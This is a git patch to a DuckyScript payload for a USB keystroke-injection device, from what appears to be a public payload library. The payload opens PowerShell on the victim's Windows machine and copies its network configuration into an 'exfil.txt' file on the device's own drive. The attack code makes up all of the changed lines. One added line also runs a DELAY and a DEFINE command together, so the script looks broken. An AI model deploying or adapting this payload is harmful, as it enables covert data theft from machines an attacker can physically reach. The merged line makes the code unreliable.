From a323fc328137866175223a13798ace9af0f761d1 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Tue, 15 Oct 2024 14:10:08 -0400
Subject: [PATCH] Update payload.txt

---
 payloads/library/credentials/IP-Out/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt
index 734c9d6..c9746ef 100644
--- a/payloads/library/credentials/IP-Out/payload.txt
+++ b/payloads/library/credentials/IP-Out/payload.txt
@@ -54,8 +54,8 @@ DELAY 500
 GUI r
 DELAY 300
 STRINGLN Powershell
-DELAY 1000
-STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
+DELAY 1000DEFINE #DRIVELABEL DUCKY
+STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
 WAIT_FOR_STORAGE_ACTIVITY
 WAIT_FOR_STORAGE_INACTIVITY
 ALT F4